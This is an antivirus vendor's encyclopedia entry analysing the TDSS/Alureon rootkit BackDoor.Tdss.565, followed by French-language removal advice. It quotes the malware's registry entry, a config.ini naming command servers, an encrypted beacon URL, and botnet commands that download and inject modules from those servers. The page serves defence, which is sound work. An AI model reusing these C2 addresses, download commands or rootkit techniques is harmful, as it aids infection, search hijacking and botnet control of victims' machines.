Bibliothèque
Ma bibliothèque

+ Ajouter à la bibliothèque

Contacter-nous !
Support 24/24 | Rules regarding submitting

Nous téléphoner

0 825 300 230

Forum

Vos requêtes

  • Toutes : -
  • Non clôturées : -
  • Dernière : le -

Nous téléphoner

0 825 300 230

Profil

BackDoor.Tdss.565

(TR/Patched.Gen, Packed.Win32.TDSS.z, TR/Crypt.ZPACK.Gen, Parser error, TR/PCK.Tdss.Z.2256,Trojan:Win32/Alureon.CT,Virus:Win32/Alureon.A,Packed.Win32.TDSS.z,Rootkit.Win32.TDSS.u, Generic.dx!fpw, TR/PCK.Tdss.Z.2341, Trojan:Win32/Alureon.CT, System error, TR/PCK.Tdss.Z.2318, TR/TDss.FL, TrojanDropper:Win32/Alureon.Q, TR/PCK.Tdss.Z.2333)

Added to the Dr.Web virus database: 2009-10-06

Virus description added:

Vulnerable OS: Windows XP/Windows Vista/Windows 7

Technical Details

For those interested in complete description of BackDoor.Tdss.565, we recommend to read the relevant (Fr) article prepared by Doctor Web Virus Analysts.

BackDoor.Tdss.565 injects its code into the system process on installation, and then uses it to create and start a temporary tdlserv service:

[HKLM\system\currentcontrolset\services\tdlserv]
Imagepath=" \??\C:\DOCUME~1\\LOCALS~1\Temp\3.tmp"
Type=1

To ensure future automatic loading, this driver infects the system driver of the physical drive where the operating system resides (for instance, atapi.sys). Original bytes of the infected driver and the rootkit core code are preserved in last disk sectors. Also, last disk sectors serve as a hidden encrypted virtual drive, which is used to store the tdlcmd.dll and tdlwsp.dll user mode components and the config.ini configuration file. The rootkit hides changes to the operating system and implements injection of user mode components according to the configuration file.

Example of the config.ini contents:

[main]
version=3.0
botid=4513c055-11f2-8278-7863-3d82b9b804c8
affid=10002
subid=0
installdate=1.10.2009 9:4:38
[injector]
svchost.exe=tdlcmd.dll
*=tdlwsp.dll
[tdlcmd]
servers=https://h3456345.cn/;https://h9237634.cn/;https://212.117.174.173/

TDLCMD.DLL Module

This module updates the rootkit and its components from a control server. From its own name, the module derives the path to the virtual drive created by the rootkit driver, and then reads information on control servers, bot identifier, etc from the config.ini. It also receives information on system version and language, and default Internet browser. The information collected is presented in the following format:

4513c055-11f2-8278-7863-3d82b9b804c8|10002|0|3.0|3.1|5.1 2600 SP1.0|ru-ru|iexplore
(botid|affid|Subid|bot_version|loader_version|system_version|locale|browser)

The string is encrypted by RC4 with the control server name as a key (for instance, h3456345.cn), then the result is encoded to base64. The resulting query is then sent to the control server.

Example:

https://h3456345.cn/gJdwOLwW21dVuODFVDCvEuknIdD1k+Bc8Rnq3uFl2VbBscU44iqKKslUgRXjw2Rb
/Vk48jWDFc3HwZ+Mno1/yx+sVdbaH0XgRMuAczm9JI2KBg==

The server replies with an encoded set of instructions, which the rootkit then executes. These instructions comprises of names of function implemented in loaded malicious modules and their execution parameters.

Example:

botnetcmd.ModuleDownloadUnxor('https://h3456345.cn/2c0lfrNDklNZveSSVX6nFesyPdarl/5J8ErqwbRkjV3ctsI4rHmDeMFWyUan0Q==', '\\?\globalroot\systemroot\system32\botnetwsp8y.dll')
botnetcmd.InjectorAdd('*','botnetwsp8y.dll')
botnetcmd.SetCmdDelay(14400)
botnetcmd.FileDownloadRandom('https://h3456345.cn/2c0lfrNDklZZveSSVX6nFesyPdarl/5J8ErqwbRkjV3ctsI4rHmDeMFWyUan0Q==','\\?\globalroot\systemroot\system32\botnet.dat')
tdlcmd.ConfigWrite('tdlcmd','delay','1800')
tdlcmd.ConfigWrite('tdlcmd','servers','https://h3456345.cn/;https://h9237634.cn/;https://212.117.174.173/')

The links in the execution parameters are encrypted commands for the control server. For instance,"2c0lfrNDklNZveSSVX6nFesyPdarl/5J8ErqwbRkjV3ctsI4rHmDeMFWyUan0Q==" equals "module|1!4513c055-11f2-8278-7863-3d82b9b804c8!". The files downloaded from these links are encoded using the bot identifier (4513c055-11f2-8278-7863-3d82b9b804c8).

In this example, botnetwsp8y.dll is an update for the tdlwsp.dll module, and the botnet.dat is a list of control servers.

TDLWSP.DLL Module

This module injects itself into all processes according to the configuration file, but operates in those processes only which names contain one of the following substrings: explore, firefox, chrome, opera, safari, netscape, avant, or browser. The module hooks the mswsock.dll!WSPStartupfunction, and then in the SPI(service provider interface) table of its handler (WSPStartup) replaces the WSPSend, WSPRecv and WSPCloseSocket procedures with its own. Thus, this module operates as a common LSP (Layered Service Provider).

After the functions are hooked, the rootkit controls all user search queries, therefore it can substitute results returned by search engines and forward the user to malicious websites. Instructions on where to forward the user and how to process key words are received from the control server.

Recommandations pour le traitement

  1. Si le système d'exploitation peut être démarré (en mode normal ou en mode sans échec), téléchargez Dr.Web Security Space et lancez un scan complet de votre ordinateur et de tous les supports amovibles que vous utilisez. En savoir plus sur Dr.Web Security Space.
  2. Si le démarrage du système d'exploitation est impossible, veuillez modifier les paramètres du BIOS de votre ordinateur pour démarrer votre ordinateur via CD/DVD ou clé USB. Téléchargez l'image du disque de secours de restauration du système Dr.Web® LiveDisk ou l'utilitaire pour enregistrer Dr.Web® LiveDisk sur une clé USB, puis préparez la clé USB appropriée. Démarrez l'ordinateur à l'aide de cette clé et lancez le scan complet et le traitement des menaces détectées.

Veuillez lancer le scan complet du système à l'aide de Dr.Web Antivirus pour Mac OS.

Veuillez lancer le scan complet de toutes les partitions du disque à l'aide de Dr.Web Antivirus pour Linux.

  1. Si votre appareil mobile fonctionne correctement, veuillez télécharger et installer sur votre appareil mobile Dr.Web pour Android. Lancez un scan complet et suivez les recommandations sur la neutralisation des menaces détectées.
  2. Si l'appareil mobile est bloqué par le Trojan de la famille Android.Locker (un message sur la violation grave de la loi ou la demande d'une rançon est affiché sur l'écran de l'appareil mobile), procédez comme suit:
    • démarrez votre Smartphone ou votre tablette en mode sans échec (si vous ne savez pas comment faire, consultez la documentation de l'appareil mobile ou contactez le fabricant) ;
    • puis téléchargez et installez sur votre appareil mobile Dr.Web pour Android et lancez un scan complet puis suivez les recommandations sur la neutralisation des menaces détectées ;
    • Débranchez votre appareil et rebranchez-le.

En savoir plus sur Dr.Web pour Android